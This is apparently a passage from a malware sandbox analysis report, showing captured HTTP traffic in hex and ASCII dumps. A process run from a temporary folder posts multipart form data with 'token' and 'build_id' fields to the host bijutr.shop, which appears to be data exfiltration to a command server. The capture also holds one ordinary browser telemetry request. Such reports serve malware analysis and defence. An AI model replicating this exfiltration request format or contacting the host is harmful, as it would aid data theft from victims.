                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 393697
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:09 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 41 53 32 4e 37 39 30 30 5a 55 33 45 55 41 31 56 41 49 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 41 53 32 4e 37 39 30 30 5a 55 33 45 55 41 31 56 41 49 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 41 53 32 4e 37 39 30 30 5a 55 33 45 55 41 31 56 41 49 35 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------AS2N7900ZU3EUA1VAI5FContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------AS2N7900ZU3EUA1VAI5FContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------AS2N7900ZU3EUA1VAI5FCont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:09 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:09 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:09 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:09 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:09 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:09 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:09 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:09 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:09 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:11 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:11 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      36192.168.2.6499213.160.188.504437132C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:11 UTC925OUTGET /b?rn=1734970511307&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=264DEDAF8CF36A9502DCF8F18D816BBC&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                      Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:12 UTC955INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:11 GMT
                                                                                                                                                                                                                                                                                                      Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                      Location: /b2?rn=1734970511307&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=264DEDAF8CF36A9502DCF8F18D816BBC&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                                                      set-cookie: UID=11521cea2404b69b6674da71734970511; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                      set-cookie: XID=11521cea2404b69b6674da71734970511; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                      Via: 1.1 a1498dff3937a5cd56baf5f0f59e01c2.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: MRS52-P5
                                                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: ojqC5J4fzm0RXhf0IipaiD1bLza-EvsMe_TYSuVV28ZcIJr3H8rRRQ==


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      37192.168.2.649970188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:12 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----S0HVS2V3W4E3EUK6P89R
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 131557
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:12 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 53 30 48 56 53 32 56 33 57 34 45 33 45 55 4b 36 50 38 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 53 30 48 56 53 32 56 33 57 34 45 33 45 55 4b 36 50 38 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 53 30 48 56 53 32 56 33 57 34 45 33 45 55 4b 36 50 38 39 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------S0HVS2V3W4E3EUK6P89RContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------S0HVS2V3W4E3EUK6P89RContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------S0HVS2V3W4E3EUK6P89RCont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
